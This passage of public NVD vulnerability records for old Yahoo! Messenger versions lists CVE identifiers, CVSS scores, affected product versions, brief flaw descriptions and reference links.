        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2009-12-02T19:30:00.250",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/37007"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/37007"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2002-12-31 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures, which could allow remote attackers to install trojan programs via DNS spoofing.
Impacted products
Vendor Product Version
yahoo messenger 4.0
yahoo messenger 5.0
yahoo messenger 5.5



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing."
    }
  ],
  "id": "CVE-2002-2361",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2002-12-31T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.iss.net/security_center/static/9984.php"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/5579"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.iss.net/security_center/static/9984.php"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/5579"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-07-10 00:30
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
Impacted products
Vendor Product Version
yahoo messenger 8.1



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "21EC84BF-CDEB-4046-8736-C77C007D368B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
    },
    {
      "lang": "es",
      "value": "Un desbordamiento de b\u00fafer en Yahoo! en Messenger versi\u00f3n 8.1, permite a usuarios autenticados remotos asistidos por el usuario, que est\u00e1n listados en una libreta de direcciones, ejecutar c\u00f3digo arbitrario por medio de vectores no especificados, tambi\u00e9n se conoce como ZD-00000005. NOTA: esta informaci\u00f3n se basa en un aviso vago de una organizaci\u00f3n de ventas de informaci\u00f3n sobre vulnerabilidades que no coordina con los proveedores o p\u00fablica avisos procesables. Ha sido asignado un CVE con fines de seguimiento, pero duplicidades con otros CVE son dif\u00edciles de determinar."
    }
  ],
  "id": "CVE-2007-3638",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2007-07-10T00:30:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/24784"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/24784"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2002-06-25 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing.
Impacted products
Vendor Product Version
yahoo messenger 4.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing."
    }
  ],
  "id": "CVE-2002-0322",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2002-06-25T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/4173"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/4173"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-07-21 00:30
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638.
Impacted products
Vendor Product Version
yahoo messenger 8.1



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "21EC84BF-CDEB-4046-8736-C77C007D368B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry.  NOTE: this might overlap CVE-2007-3638."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en Yahoo! Messenger 8.1 permite a atacantes remotos con la complicidad del usuario ejecutar c\u00f3digo de su elecci\u00f3n mediante una direcci\u00f3n larga de correo electr\u00f3nico en una entrada de la libreta de direcciones.\r\nNOTA: Esto podr\u00eda solaparse con CVE-2007-3638."
    }
  ],
  "evaluatorSolution": "The vendor has confirmed the vulnerability and a fix has been implemented server-side.  \r\n",
  "id": "CVE-2007-3928",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "HIGH",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.6,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 4.9,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2007-07-21T00:30:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/26066"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/2906"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/24926"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1018398"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.xdisclose.com/advisory/XD100002.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/26066"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/2906"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/24926"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1018398"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.xdisclose.com/advisory/XD100002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2002-07-26 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allow remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.
Impacted products
Vendor Product Version
yahoo messenger 5.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend."
    }
  ],
  "id": "CVE-2002-0031",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.6,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2002-07-26T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://online.securityfocus.com/archive/1/274223"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/137115"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/4837"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://online.securityfocus.com/archive/1/274223"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/137115"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/4837"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2012-01-19 15:55
Modified
2025-04-11 00:51
Severity ?
Summary
Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow.
Impacted products
Vendor Product Version
yahoo messenger *
yahoo messenger 0.99.17-1
yahoo messenger 1.0
yahoo messenger 1.0.4
yahoo messenger 1.0.6
yahoo messenger 2.0.1.4
yahoo messenger 3.0
yahoo messenger 3.0.1
yahoo messenger 3.0.1
yahoo messenger 3.5
yahoo messenger 4.0
yahoo messenger 4.1
yahoo messenger 5.0
yahoo messenger 5.0.1046
yahoo messenger 5.0.1065
yahoo messenger 5.0.1232
yahoo messenger 5.5
yahoo messenger 5.5.1249
yahoo messenger 5.6
yahoo messenger 5.6.0.1347
yahoo messenger 5.6.0.1351
yahoo messenger 5.6.0.1355
yahoo messenger 5.6.0.1356
yahoo messenger 5.6.0.1358
yahoo messenger 6.0
yahoo messenger 6.0.0.1643
yahoo messenger 6.0.0.1750
yahoo messenger 6.0.0.1921
yahoo messenger 6.1
yahoo messenger 7.0
yahoo messenger 7.0.0.426
yahoo messenger 7.0.0.437
yahoo messenger 7.0.438
yahoo messenger 7.5
yahoo messenger 7.5.0.814
yahoo messenger 8.0
yahoo messenger 8.0.0.505
yahoo messenger 8.0.0.508
yahoo messenger 8.0.0.701
yahoo messenger 8.0.0.716
yahoo messenger 8.0.0.863
yahoo messenger 8.0.1
yahoo messenger 8.0_2005.1.1.4
yahoo messenger 8.1
yahoo messenger 8.1.0.195
yahoo messenger 8.1.0.209
yahoo messenger 8.1.0.239
yahoo messenger 8.1.0.244
yahoo messenger 8.1.0.249
yahoo messenger 8.1.0.401
yahoo messenger 8.1.0.402
yahoo messenger 8.1.0.413
yahoo messenger 8.1.0.416
yahoo messenger 8.1.0.419
yahoo messenger 8.1.0.421
yahoo messenger 9.0.0.797
yahoo messenger 9.0.0.907
yahoo messenger 9.0.0.922
yahoo messenger 9.0.0.1389
yahoo messenger 9.0.0.1912
yahoo messenger 9.0.0.2018
yahoo messenger 9.0.0.2034
yahoo messenger 9.0.0.2112
yahoo messenger 9.0.0.2123
yahoo messenger 9.0.0.2128
yahoo messenger 9.0.0.2133
yahoo messenger 9.0.0.2136
yahoo messenger 9.0.0.2152
yahoo messenger 9.0.0.2160
yahoo messenger 9.0.0.2161
yahoo messenger 9.0.0.2162
yahoo messenger 10.0.0.331
yahoo messenger 10.0.0.525
yahoo messenger 10.0.0.542
yahoo messenger 10.0.0.1102
yahoo messenger 10.0.0.1241
yahoo messenger 10.0.0.1258
yahoo messenger 10.0.0.1264
yahoo messenger 10.0.0.1267
yahoo messenger 10.0.0.1270
yahoo messenger 11.0.0.1751
yahoo messenger 11.0.0.2009
yahoo messenger 11.0.0.2014



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0D598BB4-F9F9-4013-9D02-7A88430D7E12",
              "versionEndIncluding": "11.5.0.152",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:0.99.17-1:*:*:*:*:*:*:*",
              "matchCriteriaId": "E88F5CC4-EB8B-438E-9ADC-93231BFF5526",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0CD6E7BF-1CBD-4CED-B5C4-8390FA9DEECE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:1.0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E46751B-048A-43C9-933F-4C0E7F59F6B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:1.0.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D8167DD-2B40-44AB-9775-4D6390606A29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:2.0.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "6944C050-C328-45DB-B2C3-0CA43C0D790C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "61D8486D-5156-4A8D-92D3-CE9CF171326B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:3.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B694F873-BB64-4937-8142-83DB26425991",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:3.0.1:beta-35554:*:*:*:*:*:*",
              "matchCriteriaId": "5CFBD546-F938-4DF2-9CB3-852D83AEC7DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:3.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "847E1B09-EC05-4594-A2C9-77D8C978A77B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F7B2C0B-CC2C-4C90-8566-F449F593A3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1046:*:*:*:*:*:*:*",
              "matchCriteriaId": "E28F9A8C-206B-49D3-9F25-D25F4CD74DF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1065:*:*:*:*:*:*:*",
              "matchCriteriaId": "077D9394-E0DB-4BE1-9666-ED98A459D57C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1232:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB29459E-C84F-46BC-9679-A55D285287E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5.1249:*:*:*:*:*:*:*",
              "matchCriteriaId": "3EC324E2-C08F-4090-82CD-5A64165986F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1347:*:*:*:*:*:*:*",
              "matchCriteriaId": "CEAC4C7A-4A77-41ED-BC6D-6F962283107E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
              "matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1355:*:*:*:*:*:*:*",
              "matchCriteriaId": "E025BBCF-8E26-4E83-BA49-9A10E3011428",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1356:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC0DD432-79BA-4750-B53C-A5149DACBE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1358:*:*:*:*:*:*:*",
              "matchCriteriaId": "47ABA651-3F7A-4647-AA21-14B552694A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1643:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9479AAB-AFFD-4976-96AC-B97DE517BFC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
              "matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1921:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3FFB3BF-1092-46E4-9C0D-FF91E0FB1371",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9E358E1-680D-4B98-9E61-F0B31773373F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1C35A346-6510-44D2-A36E-E6661B6586F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.0.0.426:*:*:*:*:*:*:*",
              "matchCriteriaId": "88A599C5-C8E8-41F9-887C-DACDF809FBE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.0.0.437:*:*:*:*:*:*:*",
              "matchCriteriaId": "54DBBFA3-CB37-41B3-85DA-C8AF20A8BA7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.0.438:*:*:*:*:*:*:*",
              "matchCriteriaId": "451603CE-2DAF-47AF-A1E6-F79A514E1E51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "ADE2C978-8812-489D-94F9-186B5519545B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.5.0.814:*:*:*:*:*:*:*",
              "matchCriteriaId": "45452EA7-2FE3-496C-A523-6B5CDDB0C540",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.505:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F111CCF-7D39-4113-9138-5EAEE7BEFCBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.508:*:*:*:*:*:*:*",
              "matchCriteriaId": "A3C87FBF-A993-461B-A912-29BF7999D5A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.701:*:*:*:*:*:*:*",
              "matchCriteriaId": "D7B30F7E-536C-4547-8123-7A3E27701582",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.716:*:*:*:*:*:*:*",
              "matchCriteriaId": "2216FE62-D0A2-4BBB-973D-B839A1DDF915",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
